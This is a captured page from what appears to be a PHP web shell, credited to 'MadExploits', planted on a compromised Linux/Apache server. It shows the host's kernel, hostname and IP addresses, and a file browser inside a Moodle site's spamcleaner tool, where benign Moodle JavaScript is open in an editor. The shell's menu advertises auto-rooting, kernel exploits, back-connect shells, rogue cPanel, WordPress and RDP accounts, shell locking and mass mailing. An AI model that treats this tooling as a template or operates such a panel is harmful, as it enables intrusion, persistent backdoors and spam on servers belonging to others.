Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.127.73
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
admin /
tool /
spamcleaner /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
index.php
12.79
KB
-rw-r--r--
module.js
3.85
KB
-rw-r--r--
settings.php
1.25
KB
-rw-r--r--
version.php
1.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : module.js
M.tool_spamcleaner = { Y: null, row: null, me: null, del_all: function() { var context = M.tool_spamcleaner; var yes = confirm(M.util.get_string('spamdeleteallconfirm', 'tool_spamcleaner')); if (yes) { var cfg = { method: "POST", on: { success : function(id, o, args) { try { var resp = context.Y.JSON.parse(o.responseText); } catch(e) { alert(M.util.get_string('spaminvalidresult', 'tool_spamcleaner')); return; } if (resp == true) { window.location.href=window.location.href; } } } }; context.Y.io(context.me+'?delall=yes&sesskey='+M.cfg.sesskey, cfg); } }, del_user: function(obj, id) { var context = M.tool_spamcleaner; if (context.Y == null) { // not initialised yet return; } var yes = confirm(M.util.get_string('spamdeleteconfirm', 'tool_spamcleaner')); if (yes) { context.row = obj; var cfg = { method: "POST", on: { success : function(id, o, args) { try { var resp = context.Y.JSON.parse(o.responseText); } catch(e) { alert(M.util.get_string('spaminvalidresult', 'tool_spamcleaner')); return; } if (context.row) { if (resp == true) { while(context.row.tagName != 'TR') { context.row = context.row.parentNode; } context.row.parentNode.removeChild(context.row); context.row = null; } else { alert(M.util.get_string('spamcannotdelete', 'tool_spamcleaner')); } } } } } context.Y.io(context.me+'?del=yes&sesskey='+M.cfg.sesskey+'&id='+id, cfg); } }, ignore_user: function(obj, id) { var context = M.tool_spamcleaner; if (context.Y == null) { // not initilised yet return; } context.row = obj; var cfg = { method: "POST", on: { success : function(id, o, args) { try { var resp = context.Y.JSON.parse(o.responseText); } catch(e) { alert(M.util.get_string('spaminvalidresult', 'tool_spamcleaner')); return; } if (context.row) { if (resp == true){ while(context.row.tagName != 'TR') { context.row = context.row.parentNode; } context.row.parentNode.removeChild(context.row); context.row = null; } } } } } context.Y.io(context.me+'?ignore=yes&sesskey='+M.cfg.sesskey+'&id='+id, cfg); }, init: function(Y, me) { var context = M.tool_spamcleaner; Y.use('json', 'io-base', function (Y) { context.Y = Y; context.me = me; if (Y.one("#removeall_btn")) { Y.on("click", context.del_all, "#removeall_btn"); } }); } }
Close